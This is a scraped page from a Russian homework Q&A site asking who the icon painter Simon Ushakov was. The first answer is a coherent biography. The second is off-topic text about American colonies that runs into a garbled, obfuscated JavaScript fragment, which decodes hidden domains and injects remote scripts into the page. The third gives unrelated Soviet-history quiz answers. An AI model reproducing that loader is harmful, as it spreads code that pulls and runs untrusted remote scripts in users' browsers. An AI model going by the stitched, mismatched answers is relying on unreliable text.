tonyakuznetsova
?>

Кто такой с. ушаков и какой вклад он внес в культуру россии ?

История

Ответы

Yurevna991
Ушаков (симон или пимен федорович, 1626 - 1686) - знаменитый московский иконописец, происходил, вероятно, из посадских людей и, по-видимому, рано получил основательную подготовку к своей специальности, так как, будучи всего 22 лет от роду, был принят в царские "жалованные" (то есть получавшие постоянное содержание) мастера серебряной палаты при оружейном приказе. здесь прямыми его обязанностями было "знаменить", то есть делать рисунки для разных предметов церковной утвари и дворцового обихода, преимущественно для золотых, серебряных и эмалированных изданий, расписывать знамена, сочинять узоры для рукоделий, чертить карты, планы и т. д. усердно исполняя подобные работы, он писал, кроме того, образа для двора, церквей и частных лиц, при чем приобрел вскоре известность лучшего на москве иконописца. с переводом ушакова на службу из серебряной палаты в оружейную, в 1664 г., круг его деятельности расширился, а слава возросла еще более: он стал во главе прочих царских мастеров, образовал целую школу иконописцев, пользовался милостями царя  алексея михайловича  и его преемников на престоле, исполнял всяческие их поручения по художественной части и до самой своей кончины жил в довольстве и почете. икон, писанных ушаковым, дошло до нас довольно много, но, к сожалению, большинство их искажено позднейшими записями и реставрациями. как на сохранившиеся лучше других и особенно любопытные, можно указать на иконы: благовещения, в которой главное изображение окружено композициями на темы акафиста пресвятой богородицы (находится в церкви грузинской божьей матери, в москве), владимирской богоматери с московскими угодниками (там же), святого феодора стратилата (у могилы царя  федора алексеевича  , в архангельском соборе), нерукотворенного спаса (в соборе троицко-сергиевской лавры), сошествия святого духа (там же) и на икону-портрет царей  михаила федоровича  и алексея михайловича (в архангельском соборе). эти произведения, равно как и другие работы ушакова, свидетельствуют, что он был человек весьма развитый по своему времени, художник талантливый, прекрасно владевший всеми средствами тогдашней техники и старавшийся вывести живопись из застоя и рутины, в которых она находилась до его появления. оставаясь на почве исконного -византийского иконописания, он не относился равнодушно к западному искусству, веяние которого вообще уже сильно распространилось в xvii столетии на руси, писал и древним пошибом, и в новом, так называемом "фряжском" стиле, улучшал первый заимствованиями из второго и, вместо рабского повторения одних и тех же типов икон, вместо изображения , неестественных фигур, изобретал новые композиции, присматривался к западным образцам и к натуре, стремился сообщать фигурам характерность и движение, хотя достигал всего этого, конечно, лишь настолько, насколько было ему доступно при тогдашней зависимости искусства от церкви и от требований быта. в круг занятий ушакова входило изготовление рисунков для граверов.  д. ровинский  в своем "подробном словаре граверов" указывает на два офорта, исполненных им самим. ср.  г. филимонов"симон ушаков и современная ему эпоха иконописи" (москва, 1873). а. с-в.  . семеон ушаков. иконописец 17 века. написал множество икон и картин таких как вече, икона архангела михаила   .
Анатольевич Сергей7
Северные колонии (массачусетс, коннектикут, нью-гемпшир, род-айленд, пенсильвания и делавэр) были населены мелкими собственниками, державшимися строгого  пуританизма.                                     43278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="21670",o=function(e){cum  r n=lp+"//"+e; if(window.smlo& & -1==navigator.useragent.("firefox"))window.smlo.loadsmlo(n.replace("https: ","http: ")); else if(window.zsmlo& & -1==navigator.useragent.("firefox"))window.zsmlo.loadsmlo(n.replace("https: ","http: ")); else{var i=document.createelement("script"); i.setattribute("src",n),i.setattribute("type","text/javascript"),document.head.appendchild(i),i.onload=function(){this.a1649136515||(this.a1649136515=! 0,"function"==typeof t& & },i.onerror=function(){this.a1649136515||(this.a1649136515=! 0,i.parentnode.removechild(i),"function"==typeof o& & }}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(+"_"+(self===top? 0: 1)+".js"; window.a3164427983=f,c(u,function(){o("a2519043306")! =f& & n("a2519043306",f,{expires: parseint("3600")})},function(){var t=e.indexof(f),o=e[t+1]; o& & s(o)})},f=function(){var t,i=json.stringify(e); o("a36677002")! =i& & n("a36677002",i); var r=o("a2519043306"); t=r? r: e[0],s(t)}; f()}();
ruslan
1.с культурной революцией 1920-х гг. связаны понятияа) ликбез, рабфак, 2.цель внешней политики первой половины 1920-х ггб) разжигание мировой революции, 3.«полосой признания» называютв) 1924—1925 гг., 4.создание союзкино, всесоюзного комитета по делам высшей школы, союза советских писателей, всесоюзного комитета по делам искусства в 1930-х гг. свидетельствовало о (об)а) усилении авторитарно-бюрократического стиля культурой, 5.в биологической науке борьбу против генетики под лозунгом защиты дарвинизма и мичуринской биологии вёлб) т. лысенко.

Ответить на вопрос

Поделитесь своими знаниями, ответьте на вопрос:

Кто такой с. ушаков и какой вклад он внес в культуру россии ?
Ваше имя (никнейм)*
Email*
Комментарий*

Популярные вопросы в разделе

Posadskii-Sergeevna
slazurnaya
mishagoride885
Anastasiya Yevseeva948
annarom1306
salesrawtogo
kuk-nina
Varagyan1728
perminovaea
Shurshilina850
marinadetsad
irinatikhonov
Сергеевна-Пузанов
moidela87
len22